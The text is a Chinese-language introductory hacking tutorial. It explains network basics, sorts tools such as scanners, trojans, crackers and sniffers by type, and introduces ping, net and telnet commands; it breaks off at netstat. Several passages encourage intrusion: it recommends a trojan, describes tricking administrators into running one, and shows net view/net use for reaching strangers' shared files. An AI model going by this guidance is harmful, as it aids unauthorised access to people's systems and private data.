网路是一个资讯交换的场所,所有接入网路的电脑都可以通过彼此之间的物理連設備行资讯交换,这种物理設備包括最常見的电纜、光纜、无线WAP和微波等,但是單純擁有这些物理設備并不能实现资讯的交换,这就好像人类的身体不能缺少大脑的支配一样,资讯交换还要具備软体環境,这种“软体環境”是人类实现規定好的一些規则,被稱作“协定”,有了协定,不同的电脑可以遵照相同的协定使用物理設備,并且不会造成相互之间的“不理解”。
这种协议很类似于“摩爾斯电码”,簡單的一点一橫,经过排列可以有萬般变化,但是假如没有“对照表”,誰也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种預先規定的协议完成不同的使命,例如RFC1459协议可以实现IRC伺服器與用户端电脑的通信。因此无论是骇客还是网路管理员,都必须通过学习协定达到了解网路运作机理的目的。
每一个协议都是经过多年修改延續使用至今的,新產生的协议也大多是在基層协议基础上建立的,因而协议相对来说具有较高的安全机制,骇客很难发现协议中存在的安全問題直接入手进行网路攻击。但是对于某些新型协议,因为出现时间短、考慮欠周到,也可能会因安全問題而被骇客利用。
对于网路协定的討论,更多人则认为:现今使用的基層协议在設計之初就存在安全隱患,因而无论网路进行什么样的改动,只要现今这种网路体系不进行根本变革,从根本上就无法杜絕网路骇客的出现。但是这种骇客机能已经超出了本书的範圍,因而不在这里詳細介绍。
二、伺服器與用户端:
最簡單的网路服務形式是:若干台电脑做为用户端,使用一台电脑当作伺服器,每一个用户端都具有向伺服器提出请求的能力,而后由伺服器应答并完成请求的动作,最后伺服器会将执行结果返回给用户端电脑。这样的协议很多。例如我们平时接触的电子郵件伺服器、网站伺服器、聊天室伺服器等都屬于这种类型。另外还有一种連接方式,它不需要伺服器的支援,而是直接将两个用户端电脑进行連接,也就是说每一台电脑都既是伺服器、又是用户端,它们之间具有相同的功能,对等的完成連接和资讯交换工作。例如DCC传輸协议即屬于此种类型。
从此看出,用户端和伺服器分别是各种协议中規定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作者自己的电脑(用户端),别且向网路服務器发出常規请求完成諸如流览网页、收发电子郵件等动作的,而对于骇客来说则是通过自己的电脑(用户端)对其他电脑(有可能是用户端,也有可能是伺服器)进行攻击,以达到入侵、破坏、竊取资讯的目的。
三、系统與系统環境:
电脑要运作必须安装作業系统,如今流行的作業系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些作業系统各自独立运行,它们有自己的檔管理、记憶体管理、进程管理等机制,在网路上,这些不同的作業系统既可以作为伺服器、也可以作为用户端被使用者操作,它们之间通过“协定”来完成资讯的交换工作。
不同的作業系统配合不同的应用程式就構成了系统環境,例如Linux系统配合Apache软体可以将电脑構設成一台网站伺服器,其他使用用户端的电脑可以使用流览器来获得网站伺服器上供流览者阅读的文本资讯;再如Windows2000配合Ftpd软体可以将电脑構設成一台檔伺服器,通过远端ftp登陸可以获得系统上的各种檔资源等。
四、IP位址和埠:
我们上网,可能会同时流览网页、收发电子郵件、进行语音聊天……如此多的网路服務專案,都是通过不同的协定完成的,然而网路如此之大,我们的电脑怎么能够找到服務專案所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。
每一台上网的电脑都具有独一无二的IP位址,这个位址类似于生活中人们的家庭位址,通过网路路由器等多种物理設備(无需初级学习者理解),网路可以完成从一个电脑到另一个电脑之间的资讯交换工作,因为他们的IP位址不同,所以不会出现找不到目标的混乱局面。但是骇客可以通过特殊的方法伪造自己电脑的IP位址,这样当伺服器接受到骇客电脑(伪IP位址)的请求后,伺服器会将应答资讯传送到伪IP位址上,从而造成网路的混乱。当然,骇客也可以根據IP位址輕易的找到任何上网者或伺服器,进而对他们进行攻击(想想现实中的入室搶劫),因而如今我们会看到很多关于《如何隱藏自己IP地址》的文章。
接下来我解释一下上面提到的第二个問題:一台电脑上为什么能同时使用多种网路服務。这好像北京城有八个城门一样,不同的协定体现在不同的网路服務上,而不同的网路服務则会在用户端电脑上开闢不同的埠(城门)来完成它的资讯传送工作。当然,如果一台网路服務器同时开放了多种网路服務,那么它也要开放多个不同的埠(城门)来接納不同的用户端请求。
网路上经常听到的“后门”就是这个意思,骇客通过特殊机能在伺服器上开闢了一个网路服務,这个服務可以用来專门完成骇客的目的,那么伺服器上就会被打开一个新的埠来完成这种服務,因为这个埠是供骇客使用的,因而輕易不会被一般上网用户和网路管理员发现,即“隱藏的埠”,故“后门”。
每一台电脑都可以打开65535个埠,因而理论上我们可以开发出至少65535种不同的网路服務,然而实际上这个数位非常大,网路经常用到的服務协定不过几十个,例如流览网页用户端和服務端都使用的是80号埠,进行IRC聊天则在服務端使用6667埠、用户端使用1026埠等。
五、漏洞:
漏洞就是程式中没有考慮到的情況,例如最簡單的“弱口令”漏洞是指系统管理员忘记遮罩某些网路应用程式中的帳号;Perl程式漏洞则可能是由于程式師在設計程式的时候考慮情況不完善出现的“让程式执行起来不知所措”的代码段,“溢出”漏洞则屬于当初設計系统或者程式的时候,没有預先保留出足够的资源,而在日后使用程式是造成的资源不足;特殊IP包炸彈实际上是程式在分析某些特殊资料的时候出现错误等……
總而言之,漏洞就是程式設計上的人为疏忽,这在任何程式中都无法絕对避免,骇客也正是利用种种漏洞对网路进行攻击的,本章开始的字眼兒“网路安全”实际就是“漏洞”的意思。骇客利用漏洞完成各种攻击是最终的结果,其实真正对骇客的定義就是“寻找漏洞的人”,他们并不是以网路攻击为樂趣,而是天天沉迷在阅读他人的程式并力圖找到其中的漏洞。应该说,从某种程度上講,骇客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的骇客或者乾脆是伪骇客经常利用具有攻击性的漏洞,近些年人们才对骇客有了畏懼和敵視的心理。
六、加密與解密:
在“协议”的講解中,我提到了“由于网路設計的基層存在問題……”,簡單的说这一問題是允许所有上网者參與资讯共用,因而对某些商業、个人隱私在网路上的传送,就会暴露在眾目睽睽之下,我们的信用卡、个人电子郵件等都可以通过監听或者截获的方式被他人的到,如何才能让这些资讯安全呢?读者也许想到了“二戰中”的间諜戰:參戰国家在使用电報的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行解码工作。正是这种古老的加密方式,在现代化的网路上也依然存在它旺盛的生命力,通过加密处理的资讯在网路上传送,无论誰拿到了这份檔,只要没有“密码薄”仍然是白費力氣的。
网路上最长使用的是設置个人密码、使用DES加密鎖,这两种加密方式分别可以完成用户登陸系统、网站、电子郵件信箱和保护资讯包的工作,而骇客所要进行的工作,就是通过漏洞、暴力猜測、加密演算法反向应用等方式获得加密檔案的明文,有人把“魔高一尺、道高一仗”用在这里,的確是在恰当不过了!网路上的加密方法和需要验证密码的系统層出不窮,骇客也在寻找破解这些系统的种种辦法。
可以说,“漏洞”和“解密”是两个完全不同的骇客領域,对于不同的学习者对他们的偏好,将会直接影響到今后将会成为的骇客类型,因而在二者之间的选择,应根據个人喜好进行,本书将会側重学习“漏洞”方面的知识。
七、特洛伊木马:
特洛伊木马是一个程式,这个程式可以做程式設計者有意設計的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根據某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程式当中(也就是将这些程式也变成特洛伊木马)。根據另外的人的理解,不是有意造成任何損坏的病毒不是特洛伊木马。最终,不论如何定義,许多人僅僅用“特洛伊木马”来形容不能复制的帶有惡意的程式,以便将特洛伊木马與病毒区分开。
==================================================
四.常用骇客软体性質分类
一、扫描类软体:
扫描是骇客的眼睛,通过扫描程式,骇客可以找到攻击目标的IP位址、开放的埠号、伺服器运行的版本、程式中可能存在的漏洞等。因而根據不同的扫描目的,扫描类软体又分为位址扫描器、埠扫描器、漏洞扫描器三个类别。在很多人看来,这些扫描器获得的资讯大多数都是没有用处的,然而在骇客看来,扫描器好比骇客的眼睛,它可以让骇客清楚的了解目标,有经验的骇客则可以将目标“摸得一清二楚”,这对于攻击来说是至关重要的。同时扫描器也是网路管理员的得力助手,网路管理员可以通过它既是了解自己系统的运行狀態和可能存在的漏洞,在骇客“下手”之前将系统中的隱患清除,保证伺服器的安全穩定。
现在网路上很多扫描器在功能上都設計的非常強大,并且綜合了各种扫描需要,将各种功能集成于一身。这对于初学网路安全的学习者来说无疑是个福音,因为只要学习者手中具備一款優秀的扫描器,就可以将资讯收集工作輕鬆完成,免去了很多繁瑣的工作。但是对于一个高级骇客来说,这些现成的工具是远远不能胜任的,他们使用的程式大多自己编写开发,这样在功能上将会完全符合个人意圖,而且可以針对新漏洞既是对扫描器进行修改,在第一时间获得最寶貴的目标资料。本书此部分将会介绍扫描器的具体使用方法,而在第二部分中则会具体講述如何开发这些扫描器,请读者務必循序渐进,否则将会给自己的学习帶来很多不必要的煩惱。
二、远端監控类软体:
远端監控也叫做“木马”,这种程式实际上是在伺服器上运行一个用户端软体,而在骇客的电脑中运行一个服務端软体,如此一来,伺服器将会变成骇客的伺服器的“手下”,也就是说骇客将会利用木马程式在伺服器上开一个埠,通过这种特殊的木马功能对伺服器进行監視、控制。因此,只要学习者掌握了某个木马的使用和操作方法,就可以輕易接管网路服務器或者其他上网者的电脑。
在控制了伺服器之后,骇客的攻击行动也就接近尾聲了,然而在做这件事情之前,骇客必须想辦法让伺服器运行自己木马的那个“用户端程式”,这就需要利用漏洞或者进行欺騙。欺騙最簡單,就是想辦法让操作伺服器的人(系统管理员之类)运行骇客的用户端程式,而利用漏洞则要初学者阅读完本书后面的内容才能够做到了。
三、病毒和蠕蟲:
首先聲明一下:编写病毒的做法并不屬于骇客。病毒只不过是一种可以隱藏、复制、传播自己的程式,这种程式通常具有破坏作用,雖然病毒可以对互联网造成威脅,然而它并没有试圖寻找程式中的漏洞,所以制作病毒还有病毒本身对骇客的学习都没有实际意義。
之所以提到病毒,是因为蠕蟲和病毒有很多相似性,如蟲也是一段程式,和病毒一样具有隱藏、复制、船舶自己的功能。不同的是蠕蟲程式通常会寻找特定的系统,利用其中的漏洞完成传播自己和破坏系统的作用,另外蠕蟲程式可以将收到攻击的系统中的资料传送到骇客手中,这要看蠕蟲設計者的意圖,因而蠕蟲是介于木马和病毒之间的一类程式。
电脑蠕蟲是自包含的程式(或是一套程式),它能传播它自身功能的拷貝或它的某些部分到其他的电脑系统中(通常是经过网路連接)。蠕蟲的制造需要精深的网路知识,还要具備高超的编程水準,对于一个初学骇客的学习者来说,蠕蟲的制造和使用都是非常难理解的,并且大多数蠕蟲攻击的物件是Linux系统,而本书所使用的学习平台是Windows 95/98或Windows NT/2000,因而我同样建议初学者不要过多的涉及这部分内容,有关此部分内容也将会在《攻学兼防》的第二部分中有所介绍。
四、系统攻击和密码破解:
这类软体大多数都是由高级骇客编写出来的,供初级骇客使用的现成软体,软体本身不需要使用者具備太多的知识,使用者只要按照软体的说明操作就可以达到软体的預期目的,因而这类软体不具備学习骇客知识的功效。不过这类软体对于骇客很重要,因为它可以大幅度減小骇客的某些繁瑣工作,使用者经过对软体的設置就可以让软体自动完成重复的工作,或者由软体完成大量的猜測工作,充分利用剩余时间繼續学习网路知识。
系统攻击类软体主要分为资讯炸彈和破坏炸彈。网路上常見的垃圾电子郵件就是这种软体的“傑作”,还有聊天室中经常看到的“踢人”、“罵人”类软体、论坛的垃圾灌水器、系统藍屏炸彈也都屬于此类软体的变異形式。如果学习者能够认真学习骇客知识,最终可以自己编写类似的工具,但如果某个人天天局限于应用此类软体上,他将永远是一个“伪骇客”。
密码破解类软体和上面的软体一样,完全依*它将对学习骇客毫无帮助。对于真正的骇客来说,这种软体可以帮助寻找系统登陸密码,相对于利用漏洞,暴力破解密码要簡單许多,但是效率会非常低,但是真正的骇客无论是使用密码破解软体还是利用漏洞进入系统之后,都达到了自己入侵的目的,因此对于如何进入系统,对于某些溺爱系统攻击的骇客来说无关緊要。值得一提的是:真正执者于漏洞分析的骇客是从来不使用这种软体的,而我向来将分析漏洞作为至高无上的工作,所以也尽量不去接触此类软体。
五、監听类软体:
通过監听,骇客可以截获网路的资讯包,之后对加密的资讯包进行破解,进而分析包内的资料,获得有关系统的资讯;也可能截获个人上网的资讯包,分析的到上网帳号、系统帳号、电子郵件帳号等个人隱私资料。監听类软体最大的特点在于它是一个亦正亦邪的,因为网路资料大多经过加密,所以用它来获得密码比较艱难,因而在更多的情況下,这类软体是提供给程式开发者或者网路管理员的,他们利用这类软体进行程式的調试或伺服器的管理工作。
==================================================
五.常用骇客软体用途分类
一、防範:
这是从安全的角度出发涉及的一类软体,例如防火墙、查病毒软体、系统进程監視器、埠管理程式等都屬于此类软体。这类软体可以在最大程度上保证电脑使用者的安全和个人隱私,不被骇客破坏。网路服務器对于此类软体的需要也是十分重視的,如日誌分析软体、系统入侵软体等可以帮助管理员维护伺服器并对入侵系统的骇客进行追踪。
二、资讯搜集:
资讯搜集软体种类比较多,包括埠扫描、漏洞扫描、弱口令扫描等扫描类软体;还有監听、截获资讯包等间諜类软体,其大多数屬于亦正亦邪的软体,也就是说无论正派骇客、邪派骇客、系统管理员还是一般的电脑使用者,都可以使用者类软体完成各自不同的目的。在大多数情況下,骇客使用者类软体的頻率更高,因为他们需要依*此类软体对伺服器进行全方位的扫描,获得盡可能多的关于伺服器的资讯,在对伺服器有了充分的了解之后,才能进行骇客动作。
三、木马與蠕蟲:
这是两种类型的软体,不过他们的工作原理大致相同,都具有病毒的隱藏性和破坏性,另外此类软体还可以由擁有控制权的人进行操作,或由事先精心設計的程式完成一定的工作。当然这类软体也可以被系统管理员利用,当作远端管理伺服器的工具。
四、洪水:
所谓“洪水”即资讯垃圾炸彈,通过大量的垃圾请求可以導致目标伺服器負載超負荷而崩溃,近年来网路上又开始流行DOS分散式攻击,簡單地说也可以将其歸入此类软体中。洪水软体还可以用作郵件炸彈或者聊天式炸彈,这些都是经过簡化并由网路安全爱好者程式化的“傻瓜式”软体,也就是本书一开始指責的“伪骇客”手中经常使用的软体。
五、密码破解:
网路安全得以保证的最实用方法是依*各种加密演算法的密码系统,骇客也许可以很容易获得一份暗文密码檔,但是如果没有加密演算法,它仍然无法获得真正的密码,因此使用密码破解类软体势在必行,利用电脑的高速計算能力,此类软体可以用密码字典或者窮举等方式还原经过加密的暗文。
六、欺騙:
如果希望获得上面提到的明文密码,骇客需要对暗文进行加密演算法还原,但如果是一个复杂的密码,破解起来就不是那么簡單了。但如果让知道密码的人直接告訴骇客密码的原型,是不是更加方便?欺騙类软体就是为了完成这个目的而設計的。
七、伪装:
网路上进行的各种操作都会被ISP、伺服器记录下来,如果没有经过很好的伪装就进行骇客动作,很容易就会被反跟踪技术追查到骇客的所在,所以伪装自己的IP地址、身份是骇客非常重要的一节必修課,但是伪装技术需要高深的网路知识,一开始没有堅实的基础就要用到这一类软体了。
==================================================
学习骇客的基本環境
一、作業系统的选择:
我们经常听说骇客酷爱Linux系统,这是因为Linux相对Windows提供了更加靈活的操作方式,更加強大的功能。例如对于IP位址的伪造工作,利用Linux系统编写特殊的IP頭资讯可以輕鬆完成,然而在Windows系统下卻几乎不可能做到。但是Linux也有它不足的一面,这个系统的命令龐杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有过多的人会放棄“舒适”的Windows、放棄精彩的电脑遊戲和便捷的操作方式,去全心投入骇客学习中。而且对于初学骇客的学习者来说,大多数网路知识都可以在Windows系统中学习,相对Linux系统,Windows平台下的骇客软体也并不在少数,另外通过安装套装程式,Windows系统中也可以調试一定量的程式,因此初步学习骇客没有必要从Linux入手。
本书使用的平台WindowsME,因为对于个人用户来说,NT或者2000多少有些苛刻——系统配置要求太高;然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容測试漏洞,从远端伺服器出发,所以也不是非要WindowsME作業系统进行学习,对于少数系统版本之间的差異,学习者可以和我联系获得相应系统的学习方法。
二、需要的常用软体:
除了基本的作業系统以外,学习者还需要安装各类扫描器,之后下載一个比较優秀的木马软体、一个監听类软体,除此以外别无它求。如果有必要,读者可以自行安装本文上述软体,然后学习其用法,但是我要告訴你,对于各类炸彈、还有网路上各式各样的骇客软体,在学习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软体。
对于扫描器和監听软体,我给出以下建议,并且在本书的后面还会对这几个软体进行詳細介绍:
扫描器:
監听软体:
木马:
三、額外的工具:
如果可以安装下面的工具,将会对学习骇客有莫大的帮助,当然下面的软体主要是学习額外内容并为“第二部分”学习作鋪墊用的,所以没有也不会妨礙本书的学习。
1、后台伺服器:
擁有某些网路应用的后台服務程式,可以将自己的电脑設置成一个小型伺服器,用来学习相应的网路应用,从“内部”了解其运作机理,这将会大大提高自己对伺服器的感性认识,同时还能够在啟动伺服器的时候;監測自己伺服器上的资料,如果有其他骇客来攻击,则可以清晰的记录下对方的攻击过程,从而学习到更多的骇客攻击方法。对于本书而言,主要介绍网站的Perl和asp等脚本语言漏洞,所以可以安装一个IIS或者HTTPD。然后在安装ActivePerl,使自己的伺服器具備编譯cgi和pl脚本的能力。使用自己的伺服器还有一个好处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、有不会对网路構成威脅,一举两得。
2、C语言编譯平台:
今后在学习骇客的路途中,将会遇到很多“屬于自己的問題”,这些問題网路上的其他人可能不会注意,所以无法找到相应的程式,这个时候学习者就要自己动手开发有关的工具了,所以安装一个Borland C++将会非常便捷,通过这个编譯器,学习者既可以学习C语言,也能够修改本书后面列出的一些小程式,打造一个屬于自己的工具庫。
四、网路安全软体分类
现在我们来了解一下有关网路安全软体的分类,因为学习骇客知识是两个相互联系的过程:既学习如何黑,还要学会如何防止被黑。
1、防火墙:
这是网路上最常見的安全机制软体,防火墙有硬体的、也有软体的,大多数读者看到的可能更多都是软体防火墙。其功能主要是过濾垃圾资讯(保证系统不会受到炸彈攻击)、防止蠕蟲入侵、防止骇客入侵、增加系统隱私性(对敏感资料进行保护)、即时監控系统资源,防止系统崩溃、定期维护资料庫,備份主要资讯……防火墙可以将系统本身的漏洞修補上,让骇客没有下手的机会。另外对于擁有局域网的企業来说,防火墙可以限制系统埠的开放,禁止某些网路服務(杜絕木马)。
2、檢測软体:
互联网上有專门針对某个骇客程式进行清除的工具,但是这类软体更多是集成在殺毒软体或者防火墙软体内的,对于系统内的木马、蠕蟲可以进行檢測并清除,软体为了保护系统不受侵害,会自动保护硬碟资料、自动维护註冊表檔、檢測内容可以代码、監測系统埠开放狀態等。如果用户需要,软体还可以编写有关的脚本对指定埠进行遮罩(防火墙一样具備此功能)。
3、備份工具:
專门用来備份资料的工具可以帮助伺服器定期備份资料,并在制定时间更新资料,这样即便骇客破坏了伺服器上的资料庫,软体也可以在短时间内完全修复收到入侵的资料。另外对于个人用户,这类软体可以对硬碟进行完全映射備份,一旦系统崩溃,用户利用这类软体可以将系统恢复到原始狀態,例如Ghost就是这类软体中的佼佼者。
4、日誌紀录、分析工具:
对于伺服器来说,日誌檔是必不可少的,管理员可以通过日誌了解伺服器的请求类型和请求来源,并且根據日誌判断系统是否受到骇客攻击。通过日誌分析软体,管理员可以輕鬆的对入侵骇客进行反追踪,找到骇客的攻击来源,进而抓不骇客。这也就是为什么骇客在攻击的时候多采用IP位址伪装、伺服器跳轉,并在入侵伺服器之后清除日誌檔的原因。
==================================================
网路流行骇客软体簡介
(因主要教大家防禦而不是攻击,因此暫时不提供相关的软体下載,需要研究的朋友可以去网路搜索。稍后将有软体的詳細使用说明)
一、国產经典软体簡介(先介绍写老软体,但其在国產骇客業内有举足輕重的作用。)
溯雪
密码探測器:利用溯雪可以輕鬆的完成基于web形式的各种密码猜測工作,例如email、forum中的註冊用户密码等。软体采取多线程编写,除了支援字典和窮举以外,软体最大的特色是可以自己编写猜測規则,例如可以按照中文拼音或者英文單詞拼写規则隨机組合出字典檔,最大程度上保证了猜測的準確性。
乱刀
密码破解:乱刀可以破解unix系统中的密码暗文,对于取得了etc/passwd檔的骇客来说这是必不可少的。
天网
防火墙软体:中国第一套通过公安部认证的软硬体集成防火墙,能有效的防止骇客入侵,抵禦来自外部网路的攻击,保证内部系统的资料不被盜取,它根據系统管理者設定的安全規则把守企業网路,提供強大的访問控制、身份认证、应用选通、网路位址轉换、资讯过濾、虛擬專网、流量控制、虛擬网橋等功能。
冰河
木马类软体:国内響噹噹的木马软体,知名度絕不亞于BO,主要用于远端監控。自动跟踪螢幕变化、记录各种口令资讯、获取系统资讯、限制系统功能、任意操作檔及註冊表、远端关机、发送资讯等多种監控功能。此软体的一大特色是可以由使用者自己設置需要佔用的埠,如此一来監控类软体就很难从埠号上直接判断系统是否存在冰河了。
小分析家
監測类软体:免費网路协定分析工具,这个工具的特点是介面簡單实用,與国外的一些sniffer產品相比,如Netxray,结果更为直觀。此软体为免費版本,只能运行在NT系统下,同时编写此软体的公司还提供了软体的商業版本“网警”。
快速搜索
埠扫描器:快速搜索是一个在网路上搜索伺服器的软体,可以根據给定的位址和埠号查找机器。具有多线程同时搜索技术,可以将搜索速度提高到單线程的十倍以上。
其他:針对2000/XP扫描的D-TOOLS等。
二、常見网路安全软体簡介
Local Port Scanner
本地埠扫描器:通过这个软体可以監測本地电脑被打开的埠。此软体可以監測大多数骇客入侵或者木马佔用的埠,它有五种不同的扫描方式并可以获得有关埠的詳細扫描资讯。
A-spy
系统进程察看器:A-spy可以監測Windows系统啟动过程中調用的所有程式、执行的进程,并将结果保存在日誌檔中。这个软体的用途是檢察系统是否被安置了木马程式,同时软体还可以对系统啟动需要調用的程式进行增加、刪除和编輯等操作,改变調用程式之间的先后順序,软体支援包括NT、2000在内的所有Windows平台,具有17种方式清楚木马程式。
Netmon
圖形化Netstat命令:Netmon是圖形化的Netstat命令,它运行在Windows系统中,可以察看系统的TCP、UDP連接狀態,同时此软体提供了一份完整的木马、蠕蟲佔用埠清單,可以快速了解系统是否存在安全問題。
LANguard Network Scanner
局域网资料收集器:LANguard允许使用者扫描局域网内部的搜索电脑,搜集他们的netbios资讯、打开埠、共用情況和其他相关资料,这些资料及可以被骇客利用进行攻击,也可以被管理员利用进行安全维护,通过它可以強行关閉指定埠和共用目录。
Leechsoft's NetMonitor
TCP/IP狀態分析程式:这个软体使用于系统安全管理员、网路程式开发员、一般的擁护。此工具可以顯示电脑在上网狀態下存在的TCP/IP連接,同时还能分析是否有其他人正在監視上网者电脑中的某个埠,同时此工具内部还有一个功能強大的埠扫描程式。
Win Trinoo Server Sniper
清除Win.TrinooServer程式:Win.Trinoo是一个类似DOS攻击的木马程式,被植入它的电脑将变成一台Win.TrinooServer,骇客通过这个Server能够“借刀殺人”攻击其他电脑系统。Win TrinooServer Sniper可以高速的監測电脑是否存在此問題。
SubSeven Server Sniper
清除SubSeven Server程式:同上面的工具一样,SubSeven也是一个木马程式,而SubSeven ServerSniper则是用来檢測并清除SubSeven而設計的。不同的是,这个软体不但可以清楚SubSeven,而且还能搜集攻击者在您电脑中留下的蛛絲马迹,找到攻击者的ICQ号码、email位址等内容,从而为反跟踪提供了詳盡的资讯。
Attacker
埠監听程式:这是一个TCP/UDP埠監听程式,它可以常駐系统并在危險埠打开的时候发出警告资讯,保证个人上网隱私的安全性。
ICEWatch
BlackICE插件:这个插件可以完善BlackICE的结果列表,让列表更加詳盡,同时该插件还提供了更好的结果分类查詢功能,并且可以对结果进行复制、编輯等操作。另外此插件为BlackICE提供了聲音,可以設置软体使用过程中的提醒、警告的音效。
Isecure IP Scanner
netbios共用扫描器:骇客利用netbios的共用可以进入存在問題的电脑并对硬碟进行操作,同时还可以获得入侵电脑上的隱私资料。这个扫描器就是專门为防止此类事件发生开发的,运行软体会自动扫描目标并報告有关资料。
AnalogX Port Blocker
埠遮罩程式:当使用者的电脑上开放某个埠的时候,任何人都可以通过其开放埠访問相应资源,而AnalogX PortBlocker可以遮罩某个埠,或者設置特殊IP位址禁止对指定埠的请求,这从一定程度上方便了程式調试人员为在本地系统上从事软体的測试工作。
Tambu Dummy Server
埠遮罩程式:这个工具同上面一个程式的功能是一样的,不过不同的是,这个工具是基于控制台模式,更加适合于高手。
Tambu Registry Edit
註冊表修改程式:该程式可以让使用者手动修改系统註冊表中的各项鍵值,从而改变系统的性能,同时软体中保存了网路上常見的具有破坏性程式的资料,可以迅速確定系统註冊表中是否有可疑程式,并提供了清除和備份等功能。
==================================================
骇客必学的六条系统命令
这里我補充下,見笑了,呵呵,想学入侵,一定要知道cmd下的命令,如用ipc$入侵等,我发现有些人只知道骇客工具的使用,dos命令卻一个都不知,其实适当的熟悉一些命令也无妨!
如:刚装完系统,打开了默认共用,现在用dos命令建立一个批次处理刪除默认共用。如下:
先打开cmd視窗,輸入
copy con killshare.bat
net share c$ /del
net share d$ /del
net share e$ /del
net share admin$ /del
net share ipc$ /del (如果刪除了这个共用,则局域网无法互相访問,请注意!)
以下是原文:-----------------------------------------------------------
一、ping命令
在Windows的控制視窗中(Windows 95/98/ME的command解释器、Windows NT/2000的cmd解释器),运行ping可以看到这个命令的说明,它是一个探測本地电脑和远端电脑之间资讯传送速度的命令,这个命令需要TCP/IP协定的支援,ping将会計算一条资讯从本地发送到远端再返回所需要的时间,骇客使用这个命令决定是否对伺服器进行攻击,因为連接速度过慢会浪費时间、花費过多的上网費用。
另外这个命令还可以透过功能变数名稱找到对方伺服器的IP位址,我们知道功能变数名稱只是提供给流览网页用的,当我们看到一个不错的功能变数名稱位址后,要想通过telnet連接它,就必须知道对方的IP位址,这里也要使用ping命令的。
这个命令的基本使用格式可以通过直接运行ping获得,现在假設目标是http://www.abc.com/,则可以在控制台下輸入ping www.abc.com,经过等待会得到如下资讯:
Pinging www.abc.com[204.202.136.32] with 32 bytes of data:
Reply from 204.202.136.32:bytes=32 time=302ms TTL=240
Reply from 204.202.136.32:bytes=32 time=357ms TTL=240
Reply from 204.202.136.32:bytes=32 time=288ms TTL=240
Reply from 204.202.136.32:bytes=32 time=274ms TTL=240
Ping statistics for204.202.136.32:
Packets: Sent = 4, Received= 4, Lost = 0 (0% loss),
Approximate round triptimes in milli-seconds:
Minimum = 274ms, Maximum =357ms, Average = 305ms
注意它的返回值来判断对方OS
这些资讯的意思是:www.abc.com的IP位址是204.202.136.32,对他发送了四次数據包,资料包的大小是32位元組,每一次返回的时间分别是302ms、357ms、288ms、274ms。綜合看,发送了四个资料包全部返回,最小时间是274ms,最大时间357ms,他们的平均时间是305ms。
这样骇客就了解了連接对方伺服器使用的时间。另外这个命令还有一些特殊的用法,例如可以通过IP位址反查伺服器的NetBIOS名,现在以211.100.8.87为例,使用ping配合“-a”,在控制台下輸入命令ping -a211.100.8.87,它的返回结果是:
Pinging POPNET-FBZ9JDFV[211.100.8.87] with 32 bytes of data:
Reply from 211.100.8.87:bytes=32 time=96ms TTL=120
Reply from 211.100.8.87:bytes=32 time=110ms TTL=120
Reply from 211.100.8.87:bytes=32 time=110ms TTL=120
Reply from 211.100.8.87:bytes=32 time=109ms TTL=120
Ping statistics for211.100.8.87:
Packets: Sent = 4, Received= 4, Lost = 0 (0% loss),
Approximate round triptimes in milli-seconds:
Minimum = 96ms, Maximum =110ms, Average = 106ms
从这个结果会知道伺服器的NetBIOS名稱是POPNET-FBZ9JDFV。另外在一般情況下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情況下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,例如上面的www.abc.com返回的TTL是240,对方的系统很可能是Linux,而第二个目标的TTL是120,那么说明它使用的系统也许是Windows。
另外ping还有很多靈活的应用,我不在这里过多的介绍,读者请另行查阅此命令相关帮助檔。
二、net命令:
NET命令是很多网路命令的集合,在WindowsME/NT/2000内,很多网路功能都是以net命令为开始的,通过net help可以看到这些命令的詳細介绍:
NET CONFIG 顯示系统网路設置
NET DIAG 运行MS的DIAGNOSTICS程式顯示网路的DIAGNOSTIC资讯
NET HELP 顯示帮助资讯
NET INIT 不通过綁定来載入协定或网卡驅动
NET LOGOFF 断开連接的共用资源
NET LOGON 在WORKGROUP中登陸
NET PASSWORD 改变系统登陸密码
NET PRINT 顯示或控制列印作業及列印佇列
NET START 啟动服務,或顯示已啟动服務的列表
NET STOP 停止网路服務
NET TIME 使电脑的时鐘與另一台电脑或域的时间同步
NET USE 連接电脑或断开电脑與共用资源的連接,或顯示电脑的連接资讯
NET VER 顯示局域网内正在使用的网路連接类型和资讯
NET VIEW 顯示域列表、电脑列表或指定电脑的共用资源列表
这些命令在Win95/98中支持的比较少,只有几个基本常見的,而在NT或者2000中又元元多于上面的介绍,不过大多数对于初学者也没有必要掌握,所以我选择了WindowsME进行介绍,其中最常用到的是NET VIEW和NET USE,通过者两个命令,学习者可以連接网路上开放了远端共用的系统,并且获得资料。这种远端共用本来是为便捷操作設計的,但是很多网路管理员忽視了它的安全性,所以造成了很多不应该共用的资讯的暴露,对于学习者来说,则可以輕易获得它人电脑上的隱私资料。
例如在控制台下輸入net view\\202.96.50.24则可以获得对应IP的系统共用目录,进而找到他们的共用檔,当然这需要202.96.50.24系统的確存在共用目录,具体如何找到这些存在共用的系统,我将会在后面的文章中进行介绍。
三、telnet和ftp命令:
这两个命令分别可以远端对系统进行telnet登陸和ftp登陸,两种登陸使用的不同的协定,分别屬于两种不同的网路服務,ftp是远端檔共用服務,也就是说学习者可以将自己的资料上传、下載,但是它并没有过多的权利,无法在远端电脑上执行上传的檔;而telnet则屬于远端登陸服務,也就是说可以登陸到远端系统上,并获得一个解释器许可权,擁有解释器就意味者擁有了一定的许可权,这种许可权可能是基本的檔操作、也可能是可以控制系统的管理员许可权。
==================================================
四、netstat命令:
这个程式有助于我们了解网路的整体使用情況。它可以顯示当前正在活动的网路連接的詳細资讯,如采用的协定类型、当前主机與远端相連主机(一个或多个)的IP位址以及它们之间的連接狀態等。 使用netstat ?可以顯示它的命令格式和參数说明:
